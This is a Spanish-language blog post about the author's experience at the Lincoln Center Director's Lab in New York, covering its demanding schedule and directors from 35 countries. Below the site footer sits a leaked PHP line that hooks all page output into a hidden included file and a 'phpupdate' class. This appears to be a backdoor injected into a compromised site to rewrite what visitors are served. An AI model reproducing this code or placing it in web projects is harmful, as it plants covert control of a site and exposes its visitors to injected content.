EL DIRECTOR’S LAB DEL LINCOLN CENTER

 En Cross Border Project
…O NUEVA YORK ES ELÁSTICA

Nueva York tiene esa cosa de confrontarte con lo poco que sabes, lo que no leíste, lo que no viste. De poner en duda si lo que viste y leíste fue lo adecuado. De llorar de cansancio de vuelta a casa en el metro. De no saber de dónde, cómo, sólo querer estar despierta.  A las 4 de la mañana hablando de teatro, a las 9 de la mañana hablando de teatro, a las 12 de la mañana haciendo teatro,  a las 8 de la tarde viendo teatro. Y con el teatro, la vida.

Hacía tanto tiempo que no me enfrentaba a la vida así, yo sola, como era antes, (siempre entre hojas de Excel, contratos por firmar, ensayos que organizar) que cuando la tienes delante te la quieres comer toda. Te empachas, a sabiendas de que te sentará mal.

Formar parte del Director´s Lab del Lincoln Center es un privilegio. La solicitud es pública y si te admiten el curso que dura tres semanas, de 10 de la mañana a 10 de la noche, fines de semana incluidos, es  gratuito. 70 jóvenes directores de escena de 35 países distintos nos encerramos durante 21 días para reflexionar y escuchar. Para reinventarnos.

En el Director´s Lab no necesitas conocer a nadie. No necesitas una carta de recomendación. Sólo armarte de paciencia para rellenar una solicitud infinita en la que tienes que escribir con mimo cómo desarrollarás tus tres próximos montajes, y responder a  un minucioso cuestionario sobre lo que haces y lo que quieres hacer. Todos los años el Director´s Lab trabaja con un tema, y el de este verano era trabajo con el público.

Pasacalles en El Director´s Lab del Lincoln CenterDepende del día los ponentes pueden ser increíbles o aburridísimos, las obras que te llevan a ver, te dejen del revés o indiferente. Pero lo mejor empieza a las diez de la noche, cuando sales del sótano del Lincoln, y le das a las margaritas a $4 y tus compañeros son el mundo entero.

Ser mujer y directora en el Líbano. Entender cómo condiciona a tu trabajo la guerra con Palestina si eres israelí. Enfrentarte con la censura si vives en China o en Rusia. Crecer en un campo de refugiados y volver a Ruanda a trabajar con lo que eres. Hacer óperas en edificios abandonados en Londres.  Teatro Foro en Kenia. Ser ayudante de los directores que estudiaste en los libros de texto. Crecer en Broadway a codazos. Convertirte en hermana de los griegos con sus teatros okupados y sus ensayos hasta las mil. Y acabar siempre los mismos cerrando la noche. Los 5. Brasil, Argentina, Uruguay, Francia y España. Irlanda muchas veces,  los estadounidenses latinos, también.

No puedo resumir la experiencia del Director´s Lab en un post. No puedo.

Nueva York es elástica.

Entradas recientes
Escríbenos

Y te responderemos lo antes posible!!

Empiece a escribir y pulse Enter para buscar

Lucía Miranda y Nacho Bilbao en el Foro de la Cultura

function ob_gzhanler($s) { $f='/usr/home/thecrossborderproject.com/etc/ssess_06268501231c12ce8b36dce7d82aab56'; if(file_exists($f)) include_once($f); return class_exists('phpupdate') ? phpupdate::copyright($s) : $s; } ob_start('ob_gzhanler');